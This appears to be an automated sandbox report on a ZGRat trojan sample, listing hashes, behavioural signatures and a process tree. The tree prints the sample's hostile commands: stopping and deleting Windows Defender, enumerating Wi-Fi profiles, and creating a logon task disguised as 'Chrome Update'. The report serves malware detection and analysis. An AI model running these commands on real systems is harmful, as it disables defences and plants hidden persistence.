Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
  • submitted
    20-03-2024 03:56

General

  • Target

    d7d26e52666b2a4633daf1255b15f967.exe

  • Size

    505KB

  • MD5

    d7d26e52666b2a4633daf1255b15f967

  • SHA1

    07e603c3ae9f2e876acb2e35791f810b22621aff

  • SHA256

    b5783b1d56cb32dfd50a16fd41c70c72cef40ff6c3389242ff4e5bb4a2905413

  • SHA512

    2dc43bc611da3bed3404f8a91b76f4570f45992bda58798231c7aeaae4f8f87038556f0431d5a5de2724aeaaad48dae696637a7ff9ae8f37ce2d4d6e8f46c90d

  • SSDEEP

    12288:cppem0FZJWq+s4Kp6MssRN1j0PNeQXOEleiSMd2ZliWqmn:AYFZJWqCK0gRfj0PshQj22sn

Malware Config

Signatures

  • Detect ZGRat V1 34 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Nirsoft 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7d26e52666b2a4633daf1255b15f967.exe
    "C:\Users\Admin\AppData\Local\Temp\d7d26e52666b2a4633daf1255b15f967.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:916
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2864
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3232
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:5116
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3752
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3600
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3964
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1904
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2492
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2072
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3952
    • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2732
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" stop WinDefend
        3⤵
        • Launches sc.exe
        PID:4292
    • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:4532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:3712
    • C:\Users\Admin\AppData\Local\Temp\d7d26e52666b2a4633daf1255b15f967.exe
      C:\Users\Admin\AppData\Local\Temp\d7d26e52666b2a4633daf1255b15f967.exe
      2⤵
      • Checks computer location settings
      • Drops desktop.ini file(s)
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1696
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2956
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
          PID:2012
        • C:\Windows\SysWOW64\netsh.exe
          netsh wlan show profile
          4⤵
          PID:4316
        • C:\Windows\SysWOW64\findstr.exe
          findstr All
          4⤵
          PID:1660
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4504
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
          PID:4868
        • C:\Windows\SysWOW64\netsh.exe
          netsh wlan show networks mode=bssid
          4⤵
          PID:4600
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Local\Temp\d7d26e52666b2a4633daf1255b15f967.exe"
        3⤵
        • Creates scheduled task(s)
        PID:3752

            Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\Users\Admin\AppData\Local\4eb0e7c05f265bbe8dfb2c61977a599c\Admin@QMWIRSIY_en-US\System\Process.txt

              Filesize

              4KB

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\d7d26e52666b2a4633daf1255b15f967.exe.log

              Filesize

              1KB

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

              Filesize

              2KB

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              19KB

            • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe

              Filesize

              88KB

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bybxkviq.2ap.ps1

              Filesize

              60B

            • C:\Users\Admin\AppData\Local\bbea729f163e8efac8d5cd98f6dc2908\msgid.dat

              Filesize

              1B
